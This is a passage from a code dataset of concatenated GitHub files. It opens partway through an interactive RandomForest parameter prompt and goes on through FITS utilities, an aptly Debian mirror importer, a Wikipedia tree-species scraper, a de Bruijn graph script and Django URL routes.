Exception\n\n max_features = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"max_features =\", max_features)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter a positive maximum number of leaf nodes: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n max_leaf_nodes = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"max_leaf_nodes =\", max_leaf_nodes)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter minimum_impurity_decrease [0,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0:\n raise Exception\n\n min_impurity_decrease = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_impurity_decrease =\", min_impurity_decrease)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse bootstrap samples when building \"\n + \"trees (Y/n)? \").lower()\n if user_input == \"n\":\n bootstrap = False\n break\n elif user_input in {\"y\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"bootstrap =\", bootstrap)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse out-of-bag samples to estimate R2 \"\n + \"scores on unseen data (y/N)? 
\").lower()\n if user_input == \"y\":\n oob_score = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"oob_score =\", oob_score)\n\n if break_early:\n break\n\n while True:\n print(\"\\nEnter a positive number of CPU cores to use.\")\n user_input = input(\"Enter -1 to use all cores: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0 and user_input != -1:\n raise Exception\n\n n_jobs = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"n_jobs =\", n_jobs)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter an integer for the random number seed: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n random_state = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"random_state =\", random_state)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nEnable verbose output during training \"\n + \"(y/N)? \").lower()\n if user_input == \"y\":\n verbose = 1\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"verbose =\", bool(verbose))\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnable warm start? This will use the previous \"\n + \"solution for fitting (y/N): \").lower()\n if user_input == \"y\":\n warm_start = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"warm_start =\", warm_start)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter ccp_alpha, the complexity parameter for \"\n + \"Minimal Cost-Complexity Pruning [0,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0:\n raise Exception\n\n ccp_alpha = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"ccp_alpha =\", ccp_alpha)\n\n if break_early:\n break\n\n while bootstrap:\n user_input = \\\n input(\"\\nEnter a positive number/fraction for the maximum \"\n + \"number of samples to train the base estimators: \")\n try:\n if user_input.lower() in {\"q\", \"\"}:\n break\n\n if int(user_input) == 0:\n user_input = float(user_input)\n else:\n user_input = int(user_input)\n\n if user_input <= 0:\n raise Exception\n\n max_samples = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if bootstrap:\n print(\"max_samples =\", max_samples)\n\n break\n\n print(\"\\n===========================================\")\n print(\"= End of inputs; press enter to continue. 
=\")\n input(\"===========================================\\n\")\n\n if classifier:\n return RandomForestClassifier(n_estimators=n_estimators,\n criterion=criterion,\n max_depth=max_depth,\n min_samples_split=min_samples_split,\n min_samples_leaf=min_samples_leaf,\n min_weight_fraction_leaf=min_weight_fraction_leaf,\n max_features=max_features,\n max_leaf_nodes=max_leaf_nodes,\n min_impurity_decrease=min_impurity_decrease,\n bootstrap=bootstrap, oob_score=oob_score,\n n_jobs=n_jobs, random_state=random_state,\n verbose=verbose, warm_start=warm_start,\n class_weight=class_weight,\n ccp_alpha=ccp_alpha,\n max_samples=max_samples)\n\n return RandomForestRegressor(n_estimators=n_estimators,\n criterion=criterion, max_depth=max_depth,\n min_samples_split=min_samples_split,\n min_samples_leaf=min_samples_leaf,\n min_weight_fraction_leaf=min_weight_fraction_leaf,\n max_features=max_features,\n max_leaf_nodes=max_leaf_nodes,\n min_impurity_decrease=min_impurity_decrease,\n bootstrap=bootstrap, oob_score=oob_score,\n n_jobs=n_jobs, random_state=random_state,\n verbose=verbose, warm_start=warm_start,\n ccp_alpha=ccp_alpha,\n max_samples=max_samples)\n\n def _output_classifier_results(self):\n \"\"\"Outputs model metrics after run_classifier() finishes.\"\"\"\n print(\"\\n==================================\")\n print(\"= RandomForestClassifier Results =\")\n print(\"==================================\\n\")\n\n print(\"Classes:\\n\", self.classifier.classes_)\n print(\"\\n{:<20} {:<20}\".format(\"Accuracy:\", self.accuracy))\n\n if self.bin:\n print(\"\\n{:<20} {:<20}\".format(\"ROC AUC:\", self.roc_auc))\n else:\n print(\"\\nConfusion Matrix:\\n\", self.confusion_matrix)\n\n print(\"\\nCross Validation Scores:\", self.cross_val_scores_classifier)\n print(\"\\nFeature Importances:\", self.feature_importances_classifier)\n\n if self.gridsearch:\n print(\"\\n{:<20} {:<20}\".format(\"GridSearch Score:\",\n self.gs_result))\n\n if self.bin and self.graph_results:\n plt.plot(self.fpr, self.tpr, label=\"data 1\")\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"ROC Curve\")\n plt.legend(loc=4)\n plt.show()\n\n print(\"\\n\\nCall predict_classifier() to make predictions for new data.\")\n\n print(\"\\n===================\")\n print(\"= End of results. =\")\n print(\"===================\\n\")\n\n def _output_regressor_results(self):\n \"\"\"Outputs model metrics after run_regressor() finishes.\"\"\"\n print(\"\\n=================================\")\n print(\"= RandomForestRegressor Results =\")\n print(\"=================================\\n\")\n\n print(\"{:<20} {:<20}\".format(\"Mean Squared Error:\",\n self.mean_squared_error))\n print(\"\\n{:<20} {:<20}\".format(\"R2 Score:\", self.r2_score))\n print(\"\\n{:<20} {:<20}\".format(\"R Score:\", str(self.r_score)))\n print(\"\\nCross Validation Scores:\", self.cross_val_scores_regressor)\n print(\"\\nFeature Importances:\", self.feature_importances_regressor)\n\n if self.gridsearch:\n print(\"\\n{:<20} {:<20}\".format(\"GridSearch Score:\",\n self.gs_result))\n\n print(\"\\n\\nCall predict_regressor() to make predictions for new data.\")\n\n print(\"\\n===================\")\n print(\"= End of results. =\")\n print(\"===================\\n\")\n\n def _run_gridsearch(self, classifier):\n \"\"\"Runs GridSearch with the parameters given in run_classifier()\n or run_regressor(). 
Returns the best parameters.\"\"\"\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test = \\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n if classifier:\n acc_scorer = make_scorer(accuracy_score)\n clf = RandomForestClassifier()\n\n # Run GridSearch\n grid_obj = GridSearchCV(clf, self.gs_params, scoring=acc_scorer)\n grid_obj = grid_obj.fit(dataset_X_train, dataset_y_train)\n\n # Set the clf to the best combination of parameters\n clf = grid_obj.best_estimator_\n\n # Fit the best algorithm to the data\n clf.fit(dataset_X_train, dataset_y_train)\n predictions = clf.predict(dataset_X_test)\n self.gs_result = accuracy_score(dataset_y_test, predictions)\n else:\n clf = RandomForestRegressor()\n\n # Run GridSearch\n grid_obj = GridSearchCV(clf, self.gs_params, scoring=\"r2\")\n grid_obj = grid_obj.fit(dataset_X_train, dataset_y_train)\n\n # Set the clf to the best combination of parameters\n clf = grid_obj.best_estimator_\n\n # Fit the best algorithm to the data\n clf.fit(dataset_X_train, dataset_y_train)\n predictions = clf.predict(dataset_X_test)\n self.gs_result = clf.score(dataset_X_test, dataset_y_test)\n\n # Return the best parameters\n print(\"\\nBest GridSearch Parameters:\\n\", grid_obj.best_params_, \"\\n\")\n return grid_obj.best_params_\n\n def _check_inputs(self):\n \"\"\"Verifies if instance data is ready for use in RandomForest\n models.\n \"\"\"\n # Check if attributes exists\n if self.attributes is None:\n print(\"attributes is missing; call set_attributes(new_attributes)\",\n \"to fix this! new_attributes should be a populated numpy\",\n \"array of your independent variables.\")\n return False\n\n # Check if labels exists\n if self.labels is None:\n print(\"labels is missing; call set_labels(new_labels) to fix this!\",\n \"new_labels should be a populated dataset of classes (for\",\n \"classification) or dependent variables (for regression).\")\n return False\n\n # Check if attributes and labels have same number of rows (samples)\n if self.attributes.shape[0] != self.labels.shape[0]:\n print(\"attributes and labels don't have the same number of rows.\",\n \"Make sure the number of samples in each dataset matches!\")\n return False\n\n return True\n","repo_name":"BaratiLab/ManufacturingNet","sub_path":"ManufacturingNet/models/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":45062,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"19401050315","text":"# Bojan Nikolic\n# $Id: bnfitsutils.py,v 1.4 2006/04/03 10:47:06 bnikolic Exp $\n#\n# FITS file utilities exploting pybnfits\n\nimport os\n\nimport numpy\nimport pyfits\n\nimport pybnfits\n\n\ndef MaskToList(mask):\n\n \"Turn a mask into a list of rows to delete\"\n\n mask = numpy.array( mask, numpy.bool)\n mask = numpy.logical_not(mask)\n xr=numpy.arange( len(mask) )[mask]\n xr=numpy.array(xr)\n\n res=pybnfits.LongVector(len(xr))\n for i,v in enumerate(xr):\n res[i]=v+1\n return res\n\ndef Select(fname,\n mask):\n\n \"Remove all rows for which mask isn't true\"\n\n rowlist=MaskToList(mask)\n\n fin=pybnfits.FitsF( fname, pybnfits.FitsF.readwrite)\n\n fin.HDUseek(2)\n\n pybnfits.DeleteRows(fin, rowlist)\n\ndef Cat(fnameinlist,\n fnameout):\n\n \"Concatenate fits files\"\n\n finlist= [ pybnfits.FitsF( fname, pybnfits.FitsF.read) for fname in fnameinlist]\n\n nrowstotal= sum([ pybnfits.NRows(f, 2) for f in finlist ])\n\n fout = pybnfits.FitsF( fnameout, pybnfits.FitsF.create)\n 
fout.CreateTbl(nrowstotal, \"\")\n fout.HDUseek(2)\n\n # copy first table:\n ncols=len(pyfits.open(fnameinlist[0])[1].data.names)\n cr =1\n finlist[0].HDUseek(2)\n for i in range(ncols):\n pybnfits.CopyCol(finlist[0],\n fout ,\n i+1 ,\n i+1 ,\n True )\n cr += pybnfits.NRows(finlist[0],2)\n\n # copy the data from other files\n \n for fin in finlist[1:]:\n fin.HDUseek(2)\n for i in range(ncols):\n pybnfits.CopyColData(fin,\n fout ,\n i+1 ,\n i+1 ,\n cr )\n cr += pybnfits.NRows(fin,2)\n\n\n\n \n \n \n\n\n","repo_name":"bnikolic/oof","sub_path":"bnfits/pybind/bin/bnfitsutils.py","file_name":"bnfitsutils.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"36338705261","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nfrom pathlib import Path\nfrom os import path\nfrom subprocess import check_output, PIPE, run, CalledProcessError\nfrom sys import stderr, exit\nimport re\nimport time\nimport yaml\n\n\nclass Reprepro2AptlyFilter():\n def convert(self, filter_str):\n # remove begin/end whitespaces\n r_str = filter_str.strip()\n # Package is not a valid Aptly filter. Could be Name or empty.\n r_str = r_str.replace('Package', 'Name')\n # Aptly filters use (= value) for exact matches rather than (% =value)\n r_str = r_str.replace('% =', '= ')\n return r_str\n\n\nclass Aptly():\n class ArtifactType(Enum):\n MIRROR = 'mirror'\n REPOSITORY = 'repo'\n SNAPSHOT = 'snapshot'\n PUBLISH = 'publish'\n\n def __init__(self, debug=False, config_file=None):\n self.debug = debug\n self.config_file = config_file\n\n def __error(self, cmd, msg, exit_on_errors=False):\n print(f\"Aptly error running: {cmd}\", file=stderr)\n print(f\" --> {msg} \\n\", file=stderr)\n if exit_on_errors:\n exit(1)\n\n def check_valid_filter(self, filter_str):\n fake_mirror_name = '_test_aptly_filter'\n create_mirror_cmd = ['mirror', 'create',\n f\"-filter={filter_str}\",\n fake_mirror_name,\n 'http://deb.debian.org/debian', 'sid', 'main']\n result = self.run(create_mirror_cmd, fail_on_errors=False)\n if not result:\n return result\n delete_mirror_cmd = ['mirror', 'drop', fake_mirror_name]\n self.run(delete_mirror_cmd)\n return True\n\n def exists(self, aptly_type: ArtifactType, name):\n assert(aptly_type != Aptly.ArtifactType.PUBLISH), 'PUBLISH uses exists_publication'\n return self.run([aptly_type.value, 'show', name],\n fail_on_errors=False, show_errors=False)\n\n def exists_all_source_packages(self, aptly_type: ArtifactType, name):\n if not self.exists(aptly_type, name):\n self.__error('exists_all_source_packages method',\n f\"{aptly_type.value} does not exist\")\n return False\n\n packages_by_source = self.get_packages_by_source_package(aptly_type, name)\n source_packages = self.get_source_packages(aptly_type, name)\n\n result = True\n for source in packages_by_source:\n if source not in source_packages:\n print(f\"Source package '{source}' is missing for packages: \"\n f\"{', '.join(packages_by_source[source])}\")\n result = False\n return result\n\n def exists_publication(self, distribution, end_point):\n return self.run(['publish', 'show', distribution, end_point],\n fail_on_errors=False, show_errors=False)\n\n def get_number_of_packages(self, aptly_type: ArtifactType, name):\n output = check_output(f\"aptly {aptly_type.value} show {name}\", shell=True)\n\n for row in output.splitlines():\n if 'Number of packages' in row.decode():\n return int(row.decode().split(':')[1])\n assert(False), 
\"get_number_of_packages did not found a valid 'Number of packages' line\"\n\n # returns a dictionary with source package as index and deb packages corresponding to\n # that source package as values\n def get_packages_by_source_package(self, aptly_type: ArtifactType, name):\n packages_by_source = defaultdict(set)\n cmd = [aptly_type.value, 'search',\n '-format={{.Package}}::{{.Source}}',\n name,\n '$PackageType (= deb)']\n result = self.run(cmd, return_all_info=True)\n if result.returncode != 0:\n self.__error(cmd, result.stderr.decode('utf-8'), exit_on_errors=True)\n\n for line in result.stdout.splitlines():\n # ignore empty entries with 'no value'\n if 'no value' in line.decode('utf-8'):\n continue\n package, source = line.decode('utf-8').split('::')\n # Source field may include a parenthesized version which we'll ignore for now.\n # e.g. `pcl (1.11.1+dfsg-1)`\n if len(source.split(' ')) > 1:\n source = source.split(' ')[0]\n packages_by_source[source].add(package)\n return packages_by_source\n\n def get_source_packages(self, aptly_type, name):\n result = self.run([aptly_type.value, 'search',\n '-format={{.Package}}',\n name,\n '$PackageType (= source)'],\n return_all_info=True)\n if result.returncode == 0:\n return result.stdout.decode('utf-8').splitlines()\n # handle no source packages scenario\n if 'no results' in result.stderr.decode('utf-8'):\n return []\n else:\n self.__error('get_source_packages method', result.stderr.decode('utf-8'))\n\n def get_snapshots_from_mirror(self, mirror_name):\n result = []\n output = check_output('aptly snapshot list', shell=True)\n for row in output.splitlines():\n if f\"from mirror [{mirror_name}\" in row.decode():\n m = re.findall(r\"\\[(.*)\\]: Snapshot\", row.decode())\n result.append(m[0])\n return result\n\n def run(self, cmd=[], fail_on_errors=True, show_errors=True, return_all_info=False):\n run_cmd = ['aptly']\n if self.config_file:\n run_cmd += [f\"-config={self.config_file}\"]\n run_cmd += cmd\n if self.debug:\n print(f\"RUN {' '.join(run_cmd)}\")\n try:\n r = run(run_cmd, stdout=PIPE, stderr=PIPE)\n except CalledProcessError as e:\n if return_all_info:\n return r\n return False\n # if return_all_info is enabled return result object\n if return_all_info:\n return r\n\n if r.returncode == 0:\n return True\n else:\n if show_errors:\n self.__error(run_cmd, f\"{r.stderr.decode('utf-8')}\", fail_on_errors)\n return False\n\n\nclass UpdaterConfiguration():\n def __init__(self, input_file):\n try:\n self.config = self.__load_config_file(input_file)\n self.reprepro2aptly = Reprepro2AptlyFilter()\n\n self.architectures = self.config['architectures']\n # source was accepted as a valid architecture to indicate that\n # source packages need to be download. 
It is not a valid arch in aptly\n if 'source' in self.config['architectures']:\n self.architectures = self.config['architectures'].remove('source')\n self.architectures = self.config['architectures']\n self.component = self.config['component']\n self.filter_formula = self.reprepro2aptly.convert(\n self.config['filter_formula'])\n self.method = self.config['method']\n self.name = self.config['name']\n self.suites = self.config['suites']\n except KeyError as e:\n self.__error(f\"{e} key was not found in file {input_file}\")\n\n def __error(self, msg):\n print(f\"Configuration file error: {msg} \\n\", file=stderr)\n exit(2)\n\n def __load_config_file(self, config_file_path):\n fn = Path(config_file_path).absolute()\n try:\n with open(str(fn), 'r') as stream:\n config = yaml.safe_load(stream)\n return config\n except yaml.YAMLError as exc:\n self.__error(f\"yaml parsing error {exc}\")\n except FileNotFoundError as e:\n self.__error(f\"not found {config_file_path}\")\n\n\nclass UpdaterManager():\n def __init__(self, input_file, debug=False,\n aptly_config_file=None, \n ignore_mirror_signature=False,\n only_mirror_creation=False,\n simulate_repo_import=False,\n snapshot_and_publish=False):\n self.aptly = Aptly(debug,\n config_file=aptly_config_file)\n self.config = UpdaterConfiguration(input_file)\n self.debug = debug\n self.ignore_mirror_signature = ignore_mirror_signature\n self.only_mirror_creation = only_mirror_creation\n self.simulate_repo_import = simulate_repo_import\n self.snapshot_and_publish = snapshot_and_publish\n self.snapshot_timestamp = None\n\n def __create_aptly_mirror(self, distribution):\n assert(self.config)\n self.__log(f\"Creating aptly mirror for {distribution}\")\n mirror_name = self.__get_mirror_name(distribution)\n if self.aptly.exists(Aptly.ArtifactType.MIRROR, mirror_name):\n self.__log_ok('Removing existing mirror')\n self.aptly.run(['mirror', 'drop', mirror_name])\n create_cmd = ['mirror', 'create', '-with-sources',\n f\"-architectures={','.join(self.config.architectures)}\",\n f\"-filter={self.config.filter_formula}\"]\n if self.ignore_mirror_signature:\n create_cmd += ['-ignore-signatures']\n create_cmd += [mirror_name,\n self.config.method,\n distribution,\n self.config.component]\n self.aptly.run(create_cmd)\n update_cmd = ['mirror', 'update']\n if self.ignore_mirror_signature:\n update_cmd += ['-ignore-signatures']\n update_cmd += [mirror_name]\n self.aptly.run(update_cmd)\n\n self.__log_ok(f\"mirror {mirror_name} created\")\n\n def __create_aptly_snapshot(self, distribution):\n self.__log('Creating an aptly snapshot from local aptly repository')\n self.aptly.run(['snapshot', 'create', self.__get_snapshot_name(distribution),\n 'from', 'repo', self.__get_repo_name(distribution)])\n self.__log_ok(f\"snapshot {self.__get_snapshot_name(distribution)} created from repo {self.__get_repo_name(distribution)}\")\n\n def __error(self, msg):\n print(f\"Update Manager error: {msg} \\n\", file=stderr)\n exit(1)\n\n def __get_endpoint_name(self, distribution):\n return f\"filesystem:live:ros_bootstrap\"\n\n def __get_mirror_name(self, distribution):\n return f\"{self.config.name}-{distribution}\"\n\n def __get_repo_name(self, distribution):\n return f\"ros_bootstrap-{distribution}\"\n\n def __get_snapshot_name(self, distribution):\n if not self.snapshot_timestamp:\n self.__generate_snapshot_timestamp(distribution)\n return f\"{self.__get_repo_name(distribution)}-{self.snapshot_timestamp}\"\n\n def __generate_snapshot_timestamp(self, distribution):\n self.snapshot_timestamp = 
f\"{time.time()}\"\n\n def __import__aptly_mirror_to_repo(self, distribution):\n self.__log('Import aptly mirror into local aptly repo')\n repo_name = self.__get_repo_name(distribution)\n # create repository if it does not exist. New distribution probably\n if not self.aptly.exists(Aptly.ArtifactType.REPOSITORY, repo_name):\n self.aptly.run(['repo', 'create', repo_name])\n self.__log_ok(f\"aptly repository {repo_name} was created\")\n import_cmd = ['repo', 'import',\n self.__get_mirror_name(distribution),\n repo_name,\n self.config.filter_formula]\n if self.simulate_repo_import:\n import_cmd.insert(2, '-dry-run')\n\n self.aptly.run(import_cmd)\n self.__log_ok(f\"aptly mirror {self.__get_mirror_name(distribution)} imported to the repo {repo_name}\")\n\n def __log(self, msg):\n print(f\" {msg} \")\n\n def __log_ok(self, msg):\n self.__log(f\" [ok] {msg}\")\n\n def __publish_new_snapshot(self, dist):\n self.__log('Publish the new snapshot')\n if (self.aptly.exists_publication(dist, self.__get_endpoint_name(dist))):\n self.aptly.run(['publish', 'switch',\n dist,\n self.__get_endpoint_name(dist),\n self.__get_snapshot_name(dist)])\n self.__log_ok(f\"publish switch in {self.__get_endpoint_name(dist)} to use {self.__get_snapshot_name(dist)}\")\n\n else:\n self.aptly.run(['publish', 'snapshot',\n f\"-distribution={dist}\",\n self.__get_snapshot_name(dist),\n self.__get_endpoint_name(dist)])\n self.__log_ok(f\"new publication in {self.__get_endpoint_name(dist)} for {self.__get_snapshot_name(dist)}\")\n\n def __remove_all_generated_mirrors(self):\n for dist in self.config.suites:\n mirror_name = self.__get_mirror_name(dist)\n if self.aptly.exists(Aptly.ArtifactType.MIRROR, mirror_name):\n self.aptly.run(['mirror', 'drop', mirror_name])\n\n def run(self):\n self.__log(f\"\\n == [ PROCESSING {self.config.name} ] ==\\n\")\n for dist in self.config.suites:\n # 1. Create aptly mirrors from yaml configuration file\n self.__create_aptly_mirror(dist)\n # 2. Be sure mirror has all source packages\n self.__log(f'Check all source packages exist')\n if not self.aptly.exists_all_source_packages(Aptly.ArtifactType.MIRROR,\n self.__get_mirror_name(dist)):\n self.__remove_all_generated_mirrors()\n self.__error(f'{self.__get_mirror_name(dist)} does not have a source package. Removing generated mirrors')\n self.__log_ok('All source packages exist in the mirror')\n if self.only_mirror_creation:\n return True\n # 2. Import from mirrors to local repositories\n self.__import__aptly_mirror_to_repo(dist)\n if self.simulate_repo_import:\n self.__log_ok(f\"Simulation of the import actions from mirrors to repos finished\")\n exit(0)\n if self.snapshot_and_publish:\n # 3. Create snapshots from repositories\n self.__create_aptly_snapshot(dist)\n # 4. Publish new snapshots\n self.__publish_new_snapshot(dist)\n self.__log(f\"\\n == [ END OF PROCESSING {self.config.name} ] ==\\n\")\n return True\n\n\ndef main():\n \"\"\"\n Usage: python3 aptly_importer.py [parameters] \n \"\"\"\n usage = \"usage: python3 aptly_importer.py [parameters] \"\n parser = argparse.ArgumentParser(usage)\n parser.add_argument('config_file', type=str, default=None)\n parser.add_argument(\"--ignore-signatures\",\n help=\"Ignore mirror signatures when importing\",\n action=\"store_true\")\n parser.add_argument(\"--only-mirror-creation\",\n help=\"Perform only the mirror creation and update. 
Useful for\"\n \"checking, it does not modify anything in the system\",\n action=\"store_true\")\n\n parser.add_argument('--simulate-repo-import',\n action='store_true',\n help='Perform a dry-run until the point of simulation mirrors import to repositories')\n parser.add_argument('--snapshot-and-publish', action='store_true', help='Create and publish a snapshot of the updated distributions')\n\n args = parser.parse_args()\n\n if not path.exists(args.config_file):\n parser.error(\"Missing input file from %s\" % args.config_file)\n\n manager = UpdaterManager(input_file=args.config_file,\n ignore_mirror_signature=args.ignore_signatures,\n only_mirror_creation=args.only_mirror_creation,\n simulate_repo_import=args.simulate_repo_import,\n snapshot_and_publish=args.snapshot_and_publish)\n manager.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ros-infrastructure/reprepro-updater","sub_path":"scripts/aptly/aptly_importer.py","file_name":"aptly_importer.py","file_ext":"py","file_size_in_byte":16090,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"18972864093","text":"#!/usr/bin/python3\r\n\r\nimport re\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import get\r\n\r\nspecies_list = []\r\n\r\ndef find_species():\r\n '''\r\n The function retrieves information about organisms from\r\n https://en.wikipedia.org/wiki/List_of_trees_and_shrubs_by_taxonomic_family\r\n '''\r\n url = 'https://en.wikipedia.org/wiki/List_of_trees_and_shrubs_by_taxonomic_family'\r\n page = get(url)\r\n\r\n bs = BeautifulSoup(page.content, 'html.parser')\r\n tree_classes = bs.find_all(\"div\", {\"style\" : \"background: white; border: 1px solid rgb(153, 153, 153); padding: 1em; width: 80%;\"})\r\n\r\n for one_class in tree_classes:\r\n tree_records = one_class.find('tbody')\r\n tree_records = tree_records.find_all('tr')\r\n\r\n for one_record in tree_records:\r\n one_record = re.sub('<.*?>', '', str(one_record))\r\n\r\n if (len(one_record.split('\\n')) > 3) and one_record.split('\\n')[1] != 'Scientific name':\r\n\r\n species_dict = {}\r\n\r\n species_dict['Species'] = one_record.split('\\n')[1]\r\n species_dict['Family'] = one_record.split('\\n')[5]\r\n\r\n species_dict_copy = species_dict.copy()\r\n species_list.append(species_dict_copy)\r\n\r\n print(f'Number of tree species found: {len(species_list)}')\r\n\r\n\r\ndef save_to_json():\r\n '''Saves the results to the species.json file.'''\r\n with open('species.json', 'w', encoding=\"utf8\") as file:\r\n json.dump(species_list , file)\r\n print('Saved in \"species.json\" file.')\r\n\r\nif __name__ == '__main__':\r\n find_species()\r\n save_to_json()\r\n","repo_name":"AdrianGuzniczak/NCBI-web-scraper","sub_path":"get_species.py","file_name":"get_species.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43419877400","text":"#Rufino Salgado\r\n#cs 327-1 Spring 2020\r\n\r\nimport os\r\nfrom collections import defaultdict\r\n\r\n\r\ndef prefix(read):\r\n return read[0:len(read) - 1]\r\n\r\n\r\ndef suffix(read):\r\n return read[1:len(read)]\r\n\r\n\r\ndef prefixes(lst):\r\n prefix_lst = []\r\n for l in lst:\r\n prefix_lst.append(prefix(l))\r\n # print(prefix_lst)\r\n return prefix_lst\r\n\r\n\r\ndef suffixes(lst):\r\n suffix_lst = []\r\n for l in lst:\r\n suffix_lst.append(suffix(l))\r\n # print(suffix_lst)\r\n return suffix_lst\r\n\r\ndef print_dict(d):\r\n k = ''\r\n for key in 
d.keys():\r\n k = k + ' ['+ key + ' -> '\r\n for v in d[key]:\r\n k = k + v + ','\r\n k = k.rstrip(',')\r\n k += ']'\r\n print(k)\r\n\r\ndef output_dict(dict, output_file):\r\n path = os.environ['PYTHONPATH'] + os.path.sep + 'files' + os.path.sep + output_file\r\n f = open(path, 'w')\r\n for index, key in enumerate(dict.keys()):\r\n pair = key + ' -> '\r\n for value in dict[key]:\r\n pair += value + ','\r\n pair = pair.rstrip(',')\r\n f.write(pair)\r\n if index != len(dict.keys())-1:\r\n f.write('\\n')\r\n f.close()\r\n\r\ndef main():\r\n path = os.environ['PYTHONPATH'] + os.path.sep + 'files' + os.path.sep + 'de_bruijn_from_kmers.txt'\r\n f = open(path, 'r')\r\n lst = f.readlines()\r\n f.close()\r\n\r\n for index, l in enumerate(lst):\r\n lst[index] = l.rstrip('\\n')\r\n\r\n lst.sort()\r\n d = defaultdict(list)\r\n\r\n pfx = prefixes(lst)\r\n sfx = suffixes(lst)\r\n for l in lst:\r\n #print(l)\r\n d[l] = []\r\n\r\n print_dict(d)\r\n for l in lst:\r\n p = prefix(l)\r\n s = suffix(l)\r\n matches = []\r\n for index,kmer in enumerate(pfx):\r\n if s == kmer and kmer not in matches:\r\n matches.append(lst[index])\r\n for m in matches:\r\n d[l].append(m)\r\n\r\n removes = []\r\n for k in d.keys():\r\n if len(d[k]) == 0:\r\n removes.append(k)\r\n for r in removes:\r\n d.pop(r, None)\r\n\r\n print_dict(d)\r\n\r\n output_dict(d,'de_bruijn_from_kmers_output.txt')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n '''\r\ninput\r\nGAGG\r\nCAGG\r\nGGGG\r\nGGGA\r\nCAGG\r\nAGGG\r\nGGAG\r\n['AGGG', 'CAGG', 'CAGG', 'GAGG', 'GGAG', 'GGGA', 'GGGG']\r\n\r\noutput\r\nAGG -> GGG\r\nCAG -> AGG,AGG\r\nGAG -> AGG\r\nGGA -> GAG\r\nGGG -> GGA,GGG\r\n '''","repo_name":"RufinoSalgado21/Rosalind","sub_path":"Rosalind/Third_set/de-bruijn_from-kmers.py","file_name":"de-bruijn_from-kmers.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7233149886","text":"from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom ConstrWebsite import settings\n\nfrom . 
import views\n\n\napp_name = 'core'\nurlpatterns = [\n    path('', views.MainView.as_view()),\n    path('fontains/', views.FountainsView.as_view()),\n    path('pools/',views.PoolsView.as_view()),\n    path('baths/',views.BathView.as_view()),\n    path('spa/',views.SPAView.as_view()),\n    path('hummum/',views.HummumView.as_view()),\n    path('autowat/',views.AutowatView.as_view()),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"Kerovitar/learn","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
